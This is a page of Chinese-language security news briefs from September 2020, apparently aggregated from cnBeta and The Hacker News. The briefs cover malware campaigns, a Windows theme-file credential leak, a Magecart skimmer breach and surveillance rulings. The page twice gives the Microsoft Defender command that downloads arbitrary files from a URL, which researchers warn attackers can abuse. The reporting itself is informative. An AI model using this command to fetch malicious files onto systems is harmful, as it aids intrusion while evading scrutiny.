据外媒mspoweruser报道,他们两天前曾报道过Windows Defender增加了通过命令行下载文件的功能。比如MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]。然而有安全研究人员表示担心,新功能增加了Windows 10的攻击能力,它可能会被用来下载恶意二进制文件。 对此,微软现在发表声明回应称:“尽管有这些报告,微软Defender杀毒软件和微软Defender ATP将仍然保护客户免受恶意软件。这些程序可以侦测经由防病毒文件下载功能下载到系统的恶意文件。” 另外微软还表示,该功能不能用于特权升级。 虽然微软否认该功能存在的安全风险,但众所周知,攻击越严重系统的安全性越低。一些用户抱怨称,他们无法通过禁用该新功能来锁定自己的电脑。     (稿源:cnBeta,封面源自网络。)
2020-09-08 13:39:27hackernews.cc
作为完善 Windows 10 开发的一个重要组成部分,微软希望联网用户允许其上传部分遥测用的系统数据。通常情况下,它会包括 CPU、内存等硬件的基础配置信息,并在传输过程中予以完全的加密。基于分析,微软得以确定系统的安全性和可靠性问题,从而为后续的修复奠定基础。 尽管微软不允许用户彻底禁用遥测收集,但你始终可以清理被 Windows 收集的相关诊断数据。 矛盾的是,虽然遥测被视作 Windows 10 开发所必须、且其它企业也在利用相同的方案来改进其软件,但一些批评人士仍将其视作微软的一项“间谍”行为。 近日,微软为 Windows 10 内置的 Windows Defender(又名 Microsoft Defender)安全软件引入了一项更改。 当检测到用户尝试通过编辑 HOSTS 文件来阻止遥测时,该软件就会发出相应的警告。 维基百科上的资料称,HOSTS 文件被用于辅助网络名称解析(即主机名称到 IP 地址的相关映射)。 但在近日的 Windows 10 更新之后,Microsoft Defender 将特别检查用户的 HOSTS 文件是否已经阻止了微软的遥测服务。 如果尝试编辑 HOSTS 文件以阻止遥测,则会触发 Windows Defender 的这一警告,以阻止用户采取这一措施。 你会注意到对 HOSTS 文件的相关编辑操作将被拒绝保存,且被安全中心标记为“SettingsModifier:Win32 / HostsFileHijack”。 除非点击允许放行,否则这项涉及“严重安全风险”的文件编辑操作将无法继续。当然,这项更新也有助于防止系统文件遭遇其它形式的恶意篡改。     (稿源:cnBeta,封面源自网络。)
2020-09-08 11:12:41hackernews.cc
Bleeping Computer 援引安全研究员 Jimmy Bayne 的 Twitter 爆料称:Windows 10 的主题设置存在漏洞,恶意行为者可创建特定的主题来实施“哈希传递”(Pass-the-Hash)攻击,从而窃取用户的凭证。具体说来是,可安装与其它来源分离的主题功能,使得攻击者能够创建恶意主题文件,从而在文件打开时将用户重定向至需要输入其凭据的页面。 据悉,只需在桌面右键点击,即可引导至“个性化 -> 主题”设置页面。用户可接着点击“保存要分享的主题”,从而创建一个名为“.deskthemepack”的文件。 该方式创建的自定义主题,可通过电子邮件等渠道进行分享、下载和安装。攻击者亦可创建一个类似的“.theme”主题文件,但其中默认的壁纸设置可指向需要身份验证的网站。 当粗心的用户不慎输入其凭据时,包含详细信息的 NTLM 哈希值将被发送到站点进行身份验证,而后攻击者就能够通过特殊的逆运算软件来暴力破解非复杂的密码。 作为应对,Bleeping Computer 想到了通过组策略进行一些限制,以阻止将 NTLM 哈希凭证发送到远程主机。只是对于企业用户来说,这么做可能会干扰到正常的身份验证。 Bayne 补充道,其已将这些发现披露给微软安全响应中心(MSRC)。可惜由于这是一项“设计特性”,该 bug 并未得到修复。 至于软件巨头是否会在后续正式修复、或调整主题文件结构以防止不良利用行为,目前暂不得而知。     (稿源:cnBeta,封面源自网络。)  
2020-09-07 11:26:09hackernews.cc
至少自2018年以来,一家以金融科技行业为目标的攻击者改变了策略,加入了一种新的基于Python的远程访问特洛伊木马(RAT),该木马可以窃取密码、文档、浏览器cookie、电子邮件凭据和其他敏感信息。 在Cyber eason研究人员昨天发表的一项分析中,Evilnum不仅调整了其感染链,而且还部署了一个名为“ PyVil RAT”的Python RAT,它具有收集信息,截屏,捕获击键数据,打开SSH shell的功能,并且部署了新工具。 网络安全公司表示:“从2018年的第一份报告到今天,该集团的TTP已经随着不同的工具而发展,而集团继续专注于金融科技目标。”。 “这些变化包括感染链和持久性的改变,随着时间的推移正在扩展的新基础设施,以及使用新的Python脚本远程访问木马(RAT)”来监视其受感染的目标。 在过去的两年中,Evilnum与针对英国和欧盟范围内的公司的几次恶意软件攻击活动有关,这些恶意软件攻击活动涉及使用JavaScript和C#编写的后门程序,以及通过从恶意软件服务提供商Golden Chickens购买的工具。 早在7月,APT小组就被定位为使用鱼叉式网络钓鱼电子邮件的公司,这些电子邮件包含指向托管在Google云端硬盘上的ZIP文件的链接,以窃取软件许可证,客户信用卡信息以及投资和交易文件。 虽然他们在受感染系统中获得最初立足点的作案手法保持不变,但感染程序已发生重大变化。 除了使用带有假冒的鱼叉式网络钓鱼电子邮件(KYC)来诱骗金融业员工触发恶意软件外,攻击还从使用具有后门功能的基于JavaScript的特洛伊木马转移到了能够提供隐藏在合法可执行文件的修改版本中的恶意有效载荷,旨在逃避检测。 研究人员说:“JavaScript是这个新感染链的第一步,最终以有效载荷的传递为最终结果,该载荷是用py2exe编译的Python编写的RAT,Nocturnus研究人员称其为PyVil RAT。” 多进程传递过程(“ ddpp.exe”)在执行时,解压缩shellcode以便与攻击者控制的服务器建立通信,并接收第二个加密的可执行文件(“ fplayer.exe”),该文件用作下一阶段的下载程序以进行提取Python RAT。 研究人员指出:“在该小组的先前活动中,Evilnum的工具避免使用域与C2进行通信,而仅使用IP地址。” “虽然C2 IP地址每隔几周更改一次,但与此IP地址关联的域列表却在不断增长。” 随着APT技术的不断发展,企业必须保持警惕,员工要警惕他们的电子邮件是否存在网络钓鱼企图,并在打开来自未知发件人的电子邮件和附件时保持谨慎。     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-07 10:40:59hackernews.cc
在不允许通过 Windows 注册表方式禁用之后,Microsoft Defender 再次成为了媒体关注的焦点。近日,微软为 Defender 新增了一项功能,不过安全专家表示黑客可以利用该功能下载恶意程序。 在 4.18.2007.9 或 4.18.2009.9 版本的 Microsoft Defender 应用中,微软增加了通过命令行下载文件的功能。使用方式是 MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file] 虽然该功能本身并没有漏洞,但是该功能运行运行脚本,可以启动命令行从互联网导入更多的文件,使用本地原生的 living-off-the-land(LOLBIN)文件。将该功能添加到Windows Defender中,意味着又多了一个管理员必须关注的应用,也多了一个黑客可以利用的应用。 安全研究人员 Askar 称,这些对 Microsoft Defender 驱动的命令行工具的改变可能会被攻击者滥用。换句话说,黑客可以滥用这些二进制文件,从互联网上下载任何文件,包括恶意软件。 这也意味着,用户将能够使用 Microsoft  Defender 本身从互联网上下载任何文件。这不太可能是一个重大的安全漏洞,因为在你使用命令行工具完成下载后,Windows Defender仍然会对文件进行检查。     (稿源:cnBeta,封面源自网络。)
2020-09-04 19:21:18hackernews.cc
前言 2020年7月,NVISO检测到一组恶意Excel文档,也称为“ maldocs”,它们通过VBA激活的电子表格传递恶意软件。尽管我们曾见过恶意的VBA代码和掉落的有效载荷,但创建Excel文档本身的特定方式引起了我们的注意。 恶意Excel文档的创建者使用了一种技术,使他们无需实际使用Microsoft Office即可创建装载宏的Excel工作簿。但是在这种特定工作方式下,这些文档的检测率通常低于标准maldocs。 这篇文章概述了这些恶意文档的产生方式。此外,它简要描述了观察到的有效负载,最后以建议和危害指标结尾,以帮助保护组织免受此类攻击。   … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1328/ 消息来源:NVISO   ,封面来源:网络,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-04 18:18:40hackernews.cc
据外媒报道,一家联邦上诉法院周三裁定,美国国家安全局(NSA)收集美国民众的数十亿次通话和短信记录的计划是非法的,并可能违宪。然而,第九巡回上诉法院的三名法官小组一致表示,所谓的电话元数据计划在针对四名索马里移民的恐怖募捐刑事案件中发挥的作用非常小,以至于它没有破坏他们的定罪。 期待已久的判决是检察官的胜利,但法院意见中的一些措辞可以被视为对官员的某种责备,这些官员通过指出涉及Basaaly Moalin和其他三名男子的案件,2013年被圣地亚哥陪审团认定有罪,指控他们为青年党筹款。 法官Marsha Berzon的意见中包含了参考前NSA承包商和告密者爱德华-斯诺登在披露NSA元数据项目中的作用,得出的结论是,“大量收集”这些数据违反了《外国情报监视法案》(FISA)。 2001年”9·11事件”后,在美国前总统乔治·沃克·布什的领导下,通话跟踪工作在没有法院授权的情况下开始。从2006年开始,一个类似的项目被秘密的FISA法院批准,并多次更新,但第九巡回法院小组说,这些裁决在法律上有缺陷。 上诉法院仅仅停留在说监视计划绝对违宪,但驳回了司法部的论点,即根据40年前的法律先例,收集元数据不等于搜查,因为客户自愿与电话提供商分享这些信息。 “在这里,NSA收集了Moalin(以及其他数百万美国人)的电话元数据,多年来每天都在持续收集,”Berzon写道。“Moalin很可能对他的电话元数据有合理的隐私期望–至少,这是一个接近的问题。” Berzon的意见由前总统奥巴马任命的Jacqueline Nguyen法官和乔治·沃克·布什任命的Jack Zouhary法官共同提出。 第九巡回上诉法院法庭小组基本上认可了总部位于纽约的第二巡回法庭2015年的一项裁决,该裁决认为大规模监视与任何具体调查的联系不够,正如国会似乎要求的那样。Berzon说,被告有权注意到与外国情报有关的监视对案件有贡献,但不一定是具体的细节。但她说,即使Moalin和他的同案被告有明确的通知,也不会帮助他们的辩护。 “基于我们对机密记录的仔细审查,我们确信任何缺乏通知的情况,假设需要这种通知,并没有损害被告的利益,”她写道。“在仔细审查了机密的FISA申请和所有相关的机密信息后,我们确信,根据既定的第四修正案标准,元数据收集,即使违宪,也没有影响政府在审判中提出的证据。” 在关于该计划的公开辩论中–正如意见书中指出的那样,有六七个地方是由斯诺登的披露所引发的–许多官员指出,对Moalin的起诉是该计划有助于美国起诉恐怖主义的具体证据。官员们列举的其他例子主要是在海外。而Moalin一案并不是关于任何在美国的袭击计划,而是在索马里。 新的第九巡回上诉法院法庭意见引用了前FBI官员Sean Joyce的国会证词,称元数据计划给了特工们一个突破口,导致他们重新开始调查Moalin。但Berzon接着表示,Joyce或其他人的公开说法并不准确,因为元数据项目并没有起到关键性的作用。 她写道:“就政府官员的公开声明造成的相反印象而言,这种印象与机密记录的内容不一致。” Joyce几年前从联邦调查局退休,他没有立即回复寻求评论的消息。 在美国国会通过《美国自由法案》后,元数据项目于2015年正式关闭,该法案提供了一个新的机制,手机供应商保留了他们的数据,而不是将其交给政府。改造后的系统似乎已经在2018年或2019年被NSA放弃。 周三发布的59页意见书再次提醒人们,一些第九巡回上诉法院的上诉极其缓慢,特别是那些涉及机密信息或FISA监视的上诉。法院花了近7年时间对Moalin于2013年11月提出的上诉作出法律判决。该案于2016年11月,即特朗普在总统选举中出人意料地获胜两天后进行了辩论。 被判处18年刑期的Moalin和他的一名同案被告仍在狱中。另外两名同案被告已经刑满释放。 而此案可能还没有结束。任何被告或政府都可以向更大的11名法官组成的合议庭申请复审。最高法院的请愿也是可能的。 “我们对这一结果感到失望,特别是最近关于FISA的不当行为的更多披露进一步揭示了整个过程中缺乏透明度如何损害那些被指控犯罪的人,以及那些从未被指控的人的个人权利–包括那些电话元数据被收集和保留的美国人,”Moalin的律师Joshua L. Dratel说。“在本案中,我们认为,缺乏透明度有损于我们挑战FISA监控的能力。” 美国公民自由联盟(ACLU)称赞这一裁决是“我们隐私权的胜利”,不过这个左派组织表示,“令人失望的是,在认定对Moalin先生的监控不合法后,法院拒绝下令压制他案件中非法获得的证据”。ACLU表示,Moalin的辩护团队现在正在 “评估进一步上诉的选择”。 美国司法部发言人没有立即对这一裁决发表评论。国家安全局发言人拒绝发表评论。 最近另一项涉及非法监控指控的第九巡回上诉法院裁决花了大约6年时间才产生意见,也是由Berzon撰写的。司法部周二在一份法庭文件中表示,仍在考虑是否寻求最高法院对该案进行审查。     (稿源:cnBeta,封面源自网络。)
2020-09-04 17:35:58hackernews.cc
Verizon正在扩大对量子计算技术的测试,该运营认商为该技术可以帮助保障其网络安全。一个名为量子密钥分发的技术在华盛顿特区的试点项目获得了成功,因此Verizon它现在将在全美范围内进行测试。量子计算可以解决一些传统机器不可能解决的计算问题,最著名的就是能够破解传统的加密技术。但Verizon正在探索一种不同的方式,即使用量子计算保护那些加密的网络连接。 量子密钥分配一种比量子计算更成熟的技术,允许双方共享用于保护通信的加密密钥。这项技术的一个关键因素是能够检测是否有其他人也试图进入。Verizon首席产品创新官尼基•帕尔默(Nicki Palmer)说:“基于量子的技术可以加强当今和未来的数据安全。 Verizon的试验涉及在两个地点之间实时加密和传送视频流。量子密钥是在一个光纤网络上创建和交换的,Verizon表示,这种技术可以立即发现黑客,QKD网络利用光子的量子特性来获得密码密钥,以防止窃听。它还使用量子随机数发生器连续生成加密密钥。       (稿源:cnBeta,封面源自网络。)
2020-09-04 15:30:31hackernews.cc
前言 2020年7月,NVISO检测到一组恶意Excel文档,也称为“ maldocs”,它们通过VBA激活的电子表格传递恶意软件。尽管我们曾见过恶意的VBA代码和掉落的有效载荷,但创建Excel文档本身的特定方式引起了我们的注意。 恶意Excel文档的创建者使用了一种技术,使他们无需实际使用Microsoft Office即可创建装载宏的Excel工作簿。但是在这种特定工作方式下,这些文档的检测率通常低于标准maldocs。 这篇文章概述了这些恶意文档的产生方式。此外,它简要描述了观察到的有效负载,最后以建议和危害指标结尾,以帮助保护组织免受此类攻击。   … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1328/ 消息来源:NVISO   ,封面来源:网络,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-04 10:13:02hackernews.cc
前言 ESET研究人员发现了迄今未记录的恶意软件家族,我们将其命名为KryptoCibule。对加密货币而言,这种恶意软件具有三重威胁。它利用受害者的资源来挖掘硬币,试图通过替换剪贴板中的钱包地址来劫持交易,并泄漏与加密货币相关的文件,同时部署多种技术来避免检测。KryptoCibule在其通信基础架构中广泛使用了Tor网络和BitTorrent协议。 该恶意软件用C编写,还使用了一些合法软件。有些东西,例如Tor和Transmission torrent客户端,与安装程序捆绑在一起。其他的则在运行时下载,包括Apache httpd和Buru SFTP服务器。图1显示了各种组件及其相互作用的概述。   … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1326/ 消息与封面来源:welivesecurity   ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-03 11:29:41hackernews.cc
北京时间9月3日消息,印度总理莫迪个人网站的Twitter账号在周四稍早时候遭到入侵。莫迪个人网站账号narendramodi_in发布了一系列推文,要求其粉丝通过加密货币的形式向一个救济基金进行捐赠。这些推文随后被撤下。 Twitter证实,narendramodi_in账号遭到入侵,该公司表示已知道该账号的活动,并采取措施来保障被入侵账号的安全。“我们正在积极调查这一情况。目前,我们并未发现其他账号受影响的情况。”Twitter发言人在一份邮件声明中称。 莫迪办公室尚未就narendramodi_in账号发布的推文置评。     (稿源:凤凰网科技,封面源自网络。)
2020-09-02 16:53:54hackernews.cc
美国工资协会(APA)披露了一个影响会员和客户的数据漏洞,此前攻击者成功地在该组织的网站登录和在线商店结账页面上安装了一个网页浏览器。 APA是一个非营利性专业协会,拥有20,000多个会员和121个APA关联的本地分会,组织培训研讨会和会议,每年有超过36,000名专业人士参加。 该组织还颁发行业认可的证书,并为专业人员提供资源文本库。 登录和财务信息被盗 大约在2020年7月23日,APA发现其网站和在线商店被攻击者攻破,攻击者收集敏感信息并将其过滤到攻击者控制的服务器上。 攻击者根据APA政府高级总监Robert Wagner 发送给受影响个人的数据泄露通知,利用组织内容管理系统(CMS)中的安全漏洞入侵APA的网站和在线商店。 一旦获得对组织站点和商店的访问权,他们就将撇取器部署在网站的登录页面和APA电子商务商店的结帐部分。 据APA的安全团队表示,该恶意活动可以追溯到2020年5月13日,大约是美国东部时间下午7:30。 APA说:“未经授权的个人可以访问登录信息(即用户名和密码)和个人支付卡信息(即信用卡信息及相关数据)。” 此外,在某些情况下,攻击者还能够访问社交媒体用户名和受影响的APA成员和客户的个人资料照片。 数据泄露背后的Magecart攻击 这种类型的攻击称为网络掠夺攻击(也称为Magecart或电子掠夺),通常是攻击者使用CMS漏洞或受感染的管理员帐户在电子商务网站上部署卡片脚本造成的。 在发现攻击后,APA立即为他们的网站和商店的CMS安装了最新的安全更新,以阻止未来的攻击。 在审查了自2020年初以来对这两个站点所做的所有代码更改之后,APA的安全团队还增加了安全补丁程序的频率,并在受影响的服务器上部署了反恶意软件解决方案。 PA还为所有受影响的用户重置了密码,并提供100万美元的身份盗窃保险和通过Equifax进行的一年免费信用监控。     稿件与封面来源:BLEEPINGCOMPUTER,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。